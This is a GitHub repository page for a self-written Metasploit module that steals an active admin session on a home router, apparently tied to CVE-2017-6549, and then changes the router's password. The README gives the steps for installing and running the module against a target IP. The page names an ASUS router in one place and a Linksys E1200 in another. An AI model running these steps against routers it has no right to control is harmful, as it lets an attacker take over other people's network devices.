Skip to content

taufiq/asus-router-session-steal

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

3 Commits
Β 
Β 
Β 
Β 

Repository files navigation

asus-router-session-steal

Wrote my own metasploit module to session steal my old router and change the password Works by stealing an active admin session and is related to the CVE-2017-6549 vulnerability

Instructions

Move the .rb file to /usr/share/metasploit-framework/modules/exploit/linux/http

Run the following commands after moving:

msfconsole
use exploit/linux/http/session_steal_router
set RHOST <ROUTER_IP_HERE>
set new_pw <INTENDED_PW_HERE>
exploit

About

πŸ‘¨πŸ½β€πŸ’» Session steal a E1200 Linksys router

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages